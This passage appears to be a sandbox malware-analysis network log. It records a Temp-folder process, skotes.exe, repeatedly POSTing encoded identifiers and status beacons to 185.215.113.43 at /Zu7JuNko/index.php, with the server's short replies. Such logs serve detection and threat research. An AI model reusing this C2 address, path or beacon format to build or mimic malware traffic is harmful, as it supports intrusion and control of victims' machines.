                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    32192.168.2.550101185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:11.546442032 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:12.929306984 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    33192.168.2.550103185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:14.671928883 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:16.095777988 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:15 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    34192.168.2.550105185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:17.734579086 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:19.123548985 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:18 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:36.131922007 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:37.520129919 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    35192.168.2.550108185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:20.875996113 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:22.218266964 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:21 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:45.289169073 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:46.717390060 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    36192.168.2.550110185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:23.843540907 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:25.291801929 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:25 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    37192.168.2.550112185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:27.055140972 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:28.474555016 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:28 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:54.617069006 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:56.003976107 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    38192.168.2.550114185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:30.111016989 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:31.492491961 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:31 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:00.820262909 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:02.177285910 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:01 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    39192.168.2.550117185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:33.233762980 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:34.622838974 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:34 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:09.944502115 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:11.527740002 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:11 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    40192.168.2.550119185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:36.251724005 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:37.587023973 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:16.241905928 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:17.639616966 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:17 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    41192.168.2.550121185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:39.327333927 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:40.716308117 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:22.399816036 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
